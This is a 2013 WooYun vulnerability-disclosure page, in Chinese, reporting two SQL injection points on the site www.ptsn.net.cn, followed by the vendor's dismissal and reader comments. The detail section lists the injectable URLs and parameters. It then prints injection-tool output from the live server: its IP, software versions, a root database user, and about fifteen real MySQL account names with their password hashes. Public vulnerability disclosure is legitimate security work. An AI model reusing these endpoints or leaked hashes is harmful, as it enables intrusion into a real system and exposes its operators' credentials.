当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035414

漏洞标题:万网某站两枚高危sql注射漏洞(root权限)

相关厂商:万网

漏洞作者: Anonymous

提交时间:2013-10-09 18:39

修复时间:2013-10-11 10:08

公开时间:2013-10-11 10:08

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:11

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-09: 细节已通知厂商并且等待厂商处理中
2013-10-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

万网某站两枚高危sql注射漏洞(root权限)

详细说明:

http://www.ptsn.net.cn/standard/plan.php?plan_id=89

http://www.ptsn.net.cn/article_new/show_article.php?article_id=jhbbwj_f0136a2c-2480-917f-a841-4df06ba80295
Host IP: 121.101.219.137
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Resp. Time(avg): 1867 ms
Current DB: ccsadoc
System User: root@localhost
Installation dir: /usr/
Current User: root@localhost
Host Name: www.ptsn.net.cn
DB User & Pass: root:0af4727b4f928228:localhost
Sql Version: 5.0.77
Compile OS: redhat-linux-gnu
ptpic:0206b55f23e2e967:localhost
ccsa_rd:694bf0e84e1746b6:localhost
vpopmail:38755f107acb1b50:localhost
minfosrv:6c90aa2604862b9b:localhost
ptqc:6ec627e402484936:localhost
infosrv:1c9c80061d48e945:localhost
ptsn_auth:362f29946e86ae30:localhost
mptsn_auth:57cf2b7f207cc98c:localhost
mptqc:0107187807836006:localhost
mptpic:773359240eb9a1d9:localhost
shouli:1f1d533a5b0f5247:localhost
mlog:06988dd331f93204:localhost
readall:13f162af21797902:localhost


很多的表我就不跑了

漏洞证明:

详细说明应该够了吧

1.jpg

修复方案:

你们懂得-

版权声明:转载请注明来源 Anonymous@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-10-11 10:08

厂商回复:

首先感谢你对我们的支持与关注,该漏洞非阿里集团业务线的应用,但我们已经通知到他们做修复。谢谢~

最新状态:

暂无


漏洞评价:

评论

  1. 2013-10-11 11:18 | M0nster ( 实习白帽子 | Rank:53 漏洞数:17 | 允许我国的艺术家先富起来)

    无影响厂商忽略

  2. 2013-10-11 11:19 | Anonymous ( 普通白帽子 | Rank:146 漏洞数:30 | 园长是大傻逼)

    @M0nster = =

  3. 2013-10-11 13:09 | 子墨 ( 普通白帽子 | Rank:194 漏洞数:22 | 天地不仁,以万物为刍狗;圣人不仁,以百姓为...)

    这个不是万网的域名好不好

  4. 2013-10-11 13:43 | Anonymous ( 普通白帽子 | Rank:146 漏洞数:30 | 园长是大傻逼)

    @子墨 看回复